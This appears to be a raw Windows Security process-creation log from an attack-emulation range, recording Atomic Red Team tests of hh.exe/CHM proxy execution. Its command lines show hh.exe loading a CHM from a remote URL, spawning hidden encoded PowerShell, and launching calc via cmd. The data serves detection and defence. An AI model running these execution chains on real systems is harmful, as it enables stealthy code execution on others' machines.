07/25/2022 08:06:08 PM LogName=Security EventCode=4688 EventType=0 ComputerName=win-host-mhaag-attack-range-117 SourceName=Microsoft Windows security auditing. Type=Information RecordNumber=1748663 Keywords=Audit Success TaskCategory=Process Creation OpCode=Info Message=A new process has been created. Creator Subject: Security ID: WIN-HOST-MHAAG-\Administrator Account Name: Administrator Account Domain: WIN-HOST-MHAAG- Logon ID: 0x75393 Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x664 New Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x738 Creator Process Name: C:\Windows\hh.exe Process Command Line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -EncodedCommand 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 Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.

07/25/2022 08:06:08 PM LogName=Security EventCode=4688 EventType=0 ComputerName=win-host-mhaag-attack-range-117 SourceName=Microsoft Windows security auditing. Type=Information RecordNumber=1748638 Keywords=Audit Success TaskCategory=Process Creation OpCode=Info Message=A new process has been created. Creator Subject: Security ID: NT AUTHORITY\NETWORK SERVICE Account Name: WIN-HOST-MHAAG-$ Account Domain: WORKGROUP Logon ID: 0x3E4 Target Subject: Security ID: WIN-HOST-MHAAG-\Administrator Account Name: Administrator Account Domain: WIN-HOST-MHAAG- Logon ID: 0x75393 Process Information: New Process ID: 0x738 New Process Name: C:\Windows\hh.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x1ccc Creator Process Name: C:\Windows\System32\wbem\WmiPrvSE.exe Process Command Line: "C:\Windows\hh.exe" "its:C:\Users\Administrator\AppData\Local\Temp\2\Test.chm::/TEMPLATE_SHORTCUT_1.html"

07/25/2022 08:06:07 PM LogName=Security EventCode=4688 EventType=0 ComputerName=win-host-mhaag-attack-range-117 SourceName=Microsoft Windows security auditing. Type=Information RecordNumber=1748615 Keywords=Audit Success TaskCategory=Process Creation OpCode=Info Message=A new process has been created. Creator Subject: Security ID: WIN-HOST-MHAAG-\Administrator Account Name: Administrator Account Domain: WIN-HOST-MHAAG- Logon ID: 0x75393 Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x14c8 New Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x1174 Creator Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process Command Line: "powershell.exe" & {Invoke-ATHCompiledHelp -ExecuteShortcutCommand -InfoTechStorageHandler its -TopicExtension html -HHFilePath $env:windir\hh.exe -CHMFilePath Test.chm}

07/25/2022 08:06:06 PM LogName=Security EventCode=4688 EventType=0 ComputerName=win-host-mhaag-attack-range-117 SourceName=Microsoft Windows security auditing. Type=Information RecordNumber=1748575 Keywords=Audit Success TaskCategory=Process Creation OpCode=Info Message=A new process has been created. Creator Subject: Security ID: WIN-HOST-MHAAG-\Administrator Account Name: Administrator Account Domain: WIN-HOST-MHAAG- Logon ID: 0x75393 Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x1848 New Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x17cc Creator Process Name: C:\Windows\hh.exe Process Command Line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -EncodedCommand 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

07/25/2022 08:06:06 PM LogName=Security EventCode=4688 EventType=0 ComputerName=win-host-mhaag-attack-range-117 SourceName=Microsoft Windows security auditing. Type=Information RecordNumber=1748550 Keywords=Audit Success TaskCategory=Process Creation OpCode=Info Message=A new process has been created. Creator Subject: Security ID: NT AUTHORITY\NETWORK SERVICE Account Name: WIN-HOST-MHAAG-$ Account Domain: WORKGROUP Logon ID: 0x3E4 Target Subject: Security ID: WIN-HOST-MHAAG-\Administrator Account Name: Administrator Account Domain: WIN-HOST-MHAAG- Logon ID: 0x75393 Process Information: New Process ID: 0x17cc New Process Name: C:\Windows\hh.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x1ccc Creator Process Name: C:\Windows\System32\wbem\WmiPrvSE.exe Process Command Line: "C:\Windows\hh.exe" "its:C:\Users\Administrator\AppData\Local\Temp\2\Test.chm::/TEMPLATE_WSH_JSCRIPT_1.html"

07/25/2022 08:06:04 PM LogName=Security EventCode=4688 EventType=0 ComputerName=win-host-mhaag-attack-range-117 SourceName=Microsoft Windows security auditing. Type=Information RecordNumber=1748526 Keywords=Audit Success TaskCategory=Process Creation OpCode=Info Message=A new process has been created. Creator Subject: Security ID: WIN-HOST-MHAAG-\Administrator Account Name: Administrator Account Domain: WIN-HOST-MHAAG- Logon ID: 0x75393 Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x1220 New Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x1174 Creator Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process Command Line: "powershell.exe" & {Invoke-ATHCompiledHelp -ScriptEngine JScript -InfoTechStorageHandler its -TopicExtension html -HHFilePath $env:windir\hh.exe -CHMFilePath Test.chm}

07/25/2022 08:06:04 PM LogName=Security EventCode=4688 EventType=0 ComputerName=win-host-mhaag-attack-range-117 SourceName=Microsoft Windows security auditing. Type=Information RecordNumber=1748512 Keywords=Audit Success TaskCategory=Process Creation OpCode=Info Message=A new process has been created. Creator Subject: Security ID: WIN-HOST-MHAAG-\Administrator Account Name: Administrator Account Domain: WIN-HOST-MHAAG- Logon ID: 0x75393 Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x1810 New Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x1a10 Creator Process Name: C:\Windows\hh.exe Process Command Line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -EncodedCommand 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

07/25/2022 08:06:04 PM LogName=Security EventCode=4688 EventType=0 ComputerName=win-host-mhaag-attack-range-117 SourceName=Microsoft Windows security auditing. Type=Information RecordNumber=1748507 Keywords=Audit Success TaskCategory=Process Creation OpCode=Info Message=A new process has been created. Creator Subject: Security ID: WIN-HOST-MHAAG-\Administrator Account Name: Administrator Account Domain: WIN-HOST-MHAAG- Logon ID: 0x75393 Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x1a10 New Process Name: C:\Windows\hh.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x1cd0 Creator Process Name: C:\Windows\explorer.exe Process Command Line: "C:\Windows\hh.exe" C:\Users\Administrator\AppData\Local\Temp\2\Test.chm

07/25/2022 08:06:01 PM LogName=Security EventCode=4688 EventType=0 ComputerName=win-host-mhaag-attack-range-117 SourceName=Microsoft Windows security auditing. Type=Information RecordNumber=1748439 Keywords=Audit Success TaskCategory=Process Creation OpCode=Info Message=A new process has been created. Creator Subject: Security ID: WIN-HOST-MHAAG-\Administrator Account Name: Administrator Account Domain: WIN-HOST-MHAAG- Logon ID: 0x75393 Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x1864 New Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x1e84 Creator Process Name: C:\Windows\hh.exe Process Command Line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -EncodedCommand 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

07/25/2022 08:06:01 PM LogName=Security EventCode=4688 EventType=0 ComputerName=win-host-mhaag-attack-range-117 SourceName=Microsoft Windows security auditing. Type=Information RecordNumber=1748414 Keywords=Audit Success TaskCategory=Process Creation OpCode=Info Message=A new process has been created. Creator Subject: Security ID: NT AUTHORITY\NETWORK SERVICE Account Name: WIN-HOST-MHAAG-$ Account Domain: WORKGROUP Logon ID: 0x3E4 Target Subject: Security ID: WIN-HOST-MHAAG-\Administrator Account Name: Administrator Account Domain: WIN-HOST-MHAAG- Logon ID: 0x75393 Process Information: New Process ID: 0x1e84 New Process Name: C:\Windows\hh.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x1ccc Creator Process Name: C:\Windows\System32\wbem\WmiPrvSE.exe Process Command Line: "C:\Windows\hh.exe" "its:C:\Users\Administrator\AppData\Local\Temp\2\Test.chm"

07/25/2022 08:06:00 PM LogName=Security EventCode=4688 EventType=0 ComputerName=win-host-mhaag-attack-range-117 SourceName=Microsoft Windows security auditing. Type=Information RecordNumber=1748389 Keywords=Audit Success TaskCategory=Process Creation OpCode=Info Message=A new process has been created. Creator Subject: Security ID: WIN-HOST-MHAAG-\Administrator Account Name: Administrator Account Domain: WIN-HOST-MHAAG- Logon ID: 0x75393 Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x1ff0 New Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x1174 Creator Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process Command Line: "powershell.exe" & {Invoke-ATHCompiledHelp -InfoTechStorageHandler its -HHFilePath $env:windir\hh.exe -CHMFilePath Test.chm}

07/25/2022 08:05:59 PM LogName=Security EventCode=4688 EventType=0 ComputerName=win-host-mhaag-attack-range-117 SourceName=Microsoft Windows security auditing. Type=Information RecordNumber=1748351 Keywords=Audit Success TaskCategory=Process Creation OpCode=Info Message=A new process has been created. Creator Subject: Security ID: WIN-HOST-MHAAG-\Administrator Account Name: Administrator Account Domain: WIN-HOST-MHAAG- Logon ID: 0x75393 Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x8b8 New Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x1730 Creator Process Name: C:\Windows\hh.exe Process Command Line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -EncodedCommand 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

07/25/2022 08:05:59 PM LogName=Security EventCode=4688 EventType=0 ComputerName=win-host-mhaag-attack-range-117 SourceName=Microsoft Windows security auditing. Type=Information RecordNumber=1748323 Keywords=Audit Success TaskCategory=Process Creation OpCode=Info Message=A new process has been created. Creator Subject: Security ID: NT AUTHORITY\NETWORK SERVICE Account Name: WIN-HOST-MHAAG-$ Account Domain: WORKGROUP Logon ID: 0x3E4 Target Subject: Security ID: WIN-HOST-MHAAG-\Administrator Account Name: Administrator Account Domain: WIN-HOST-MHAAG- Logon ID: 0x75393 Process Information: New Process ID: 0x1730 New Process Name: C:\Windows\hh.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x1ccc Creator Process Name: C:\Windows\System32\wbem\WmiPrvSE.exe Process Command Line: "C:\Windows\hh.exe" "C:\Users\Administrator\AppData\Local\Temp\2\Test.chm"

07/25/2022 08:05:56 PM LogName=Security EventCode=4688 EventType=0 ComputerName=win-host-mhaag-attack-range-117 SourceName=Microsoft Windows security auditing. Type=Information RecordNumber=1748297 Keywords=Audit Success TaskCategory=Process Creation OpCode=Info Message=A new process has been created. Creator Subject: Security ID: WIN-HOST-MHAAG-\Administrator Account Name: Administrator Account Domain: WIN-HOST-MHAAG- Logon ID: 0x75393 Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x2f8 New Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x1174 Creator Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process Command Line: "powershell.exe" & {Invoke-ATHCompiledHelp -HHFilePath $env:windir\hh.exe -CHMFilePath Test.chm}

07/25/2022 08:05:55 PM LogName=Security EventCode=4688 EventType=0 ComputerName=win-host-mhaag-attack-range-117 SourceName=Microsoft Windows security auditing. Type=Information RecordNumber=1748293 Keywords=Audit Success TaskCategory=Process Creation OpCode=Info Message=A new process has been created. Creator Subject: Security ID: WIN-HOST-MHAAG-\Administrator Account Name: Administrator Account Domain: WIN-HOST-MHAAG- Logon ID: 0x75393 Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x15f0 New Process Name: C:\Windows\hh.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0xf40 Creator Process Name: C:\Windows\System32\cmd.exe Process Command Line: hh.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.001/src/T1218.001.chm

07/25/2022 08:05:55 PM LogName=Security EventCode=4688 EventType=0 ComputerName=win-host-mhaag-attack-range-117 SourceName=Microsoft Windows security auditing. Type=Information RecordNumber=1748291 Keywords=Audit Success TaskCategory=Process Creation OpCode=Info Message=A new process has been created. Creator Subject: Security ID: WIN-HOST-MHAAG-\Administrator Account Name: Administrator Account Domain: WIN-HOST-MHAAG- Logon ID: 0x75393 Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0xf40 New Process Name: C:\Windows\System32\cmd.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x1174 Creator Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process Command Line: "cmd.exe" /c "hh.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.001/src/T1218.001.chm"

07/25/2022 08:05:43 PM LogName=Security EventCode=4688 EventType=0 ComputerName=win-host-mhaag-attack-range-117 SourceName=Microsoft Windows security auditing. Type=Information RecordNumber=1748271 Keywords=Audit Success TaskCategory=Process Creation OpCode=Info Message=A new process has been created. Creator Subject: Security ID: WIN-HOST-MHAAG-\Administrator Account Name: Administrator Account Domain: WIN-HOST-MHAAG- Logon ID: 0x75393 Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x18b0 New Process Name: C:\Windows\System32\cmd.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x1650 Creator Process Name: C:\Windows\hh.exe Process Command Line: "C:\Windows\System32\cmd.exe" /c calc.exe

07/25/2022 08:05:43 PM LogName=Security EventCode=4688 EventType=0 ComputerName=win-host-mhaag-attack-range-117 SourceName=Microsoft Windows security auditing. Type=Information RecordNumber=1748270 Keywords=Audit Success TaskCategory=Process Creation OpCode=Info Message=A new process has been created. Creator Subject: Security ID: WIN-HOST-MHAAG-\Administrator Account Name: Administrator Account Domain: WIN-HOST-MHAAG- Logon ID: 0x75393 Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x1650 New Process Name: C:\Windows\hh.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x102c Creator Process Name: C:\Windows\System32\cmd.exe Process Command Line: hh.exe C:\AtomicRedTeam\atomics\T1218.001\src\T1218.001.chm

07/25/2022 08:05:43 PM LogName=Security EventCode=4688 EventType=0 ComputerName=win-host-mhaag-attack-range-117 SourceName=Microsoft Windows security auditing. Type=Information RecordNumber=1748268 Keywords=Audit Success TaskCategory=Process Creation OpCode=Info Message=A new process has been created. Creator Subject: Security ID: WIN-HOST-MHAAG-\Administrator Account Name: Administrator Account Domain: WIN-HOST-MHAAG- Logon ID: 0x75393 Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x102c New Process Name: C:\Windows\System32\cmd.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x1174 Creator Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process Command Line: "cmd.exe" /c "hh.exe C:\AtomicRedTeam\atomics\T1218.001\src\T1218.001.chm"
The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 07/25/2022 04:00:42 PM LogName=Security EventCode=4688 EventType=0 ComputerName=win-host-mhaag-attack-range-117 SourceName=Microsoft Windows security auditing. Type=Information RecordNumber=1736870 Keywords=Audit Success TaskCategory=Process Creation OpCode=Info Message=A new process has been created. Creator Subject: Security ID: WIN-HOST-MHAAG-\Administrator Account Name: Administrator Account Domain: WIN-HOST-MHAAG- Logon ID: 0x75393 Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x1a44 New Process Name: C:\Windows\System32\cmd.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x107c Creator Process Name: C:\Windows\hh.exe Process Command Line: "C:\Windows\System32\cmd.exe" /c calc.exe Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. 
The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 07/25/2022 04:00:42 PM LogName=Security EventCode=4688 EventType=0 ComputerName=win-host-mhaag-attack-range-117 SourceName=Microsoft Windows security auditing. Type=Information RecordNumber=1736869 Keywords=Audit Success TaskCategory=Process Creation OpCode=Info Message=A new process has been created. Creator Subject: Security ID: WIN-HOST-MHAAG-\Administrator Account Name: Administrator Account Domain: WIN-HOST-MHAAG- Logon ID: 0x75393 Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x107c New Process Name: C:\Windows\hh.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x17b0 Creator Process Name: C:\Windows\System32\cmd.exe Process Command Line: hh.exe C:\AtomicRedTeam\atomics\T1218.001\src\T1218.001.chm Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. 
The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 07/25/2022 04:00:42 PM LogName=Security EventCode=4688 EventType=0 ComputerName=win-host-mhaag-attack-range-117 SourceName=Microsoft Windows security auditing. Type=Information RecordNumber=1736867 Keywords=Audit Success TaskCategory=Process Creation OpCode=Info Message=A new process has been created. Creator Subject: Security ID: WIN-HOST-MHAAG-\Administrator Account Name: Administrator Account Domain: WIN-HOST-MHAAG- Logon ID: 0x75393 Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x17b0 New Process Name: C:\Windows\System32\cmd.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x1174 Creator Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process Command Line: "cmd.exe" /c "hh.exe C:\AtomicRedTeam\atomics\T1218.001\src\T1218.001.chm" Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. 
The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.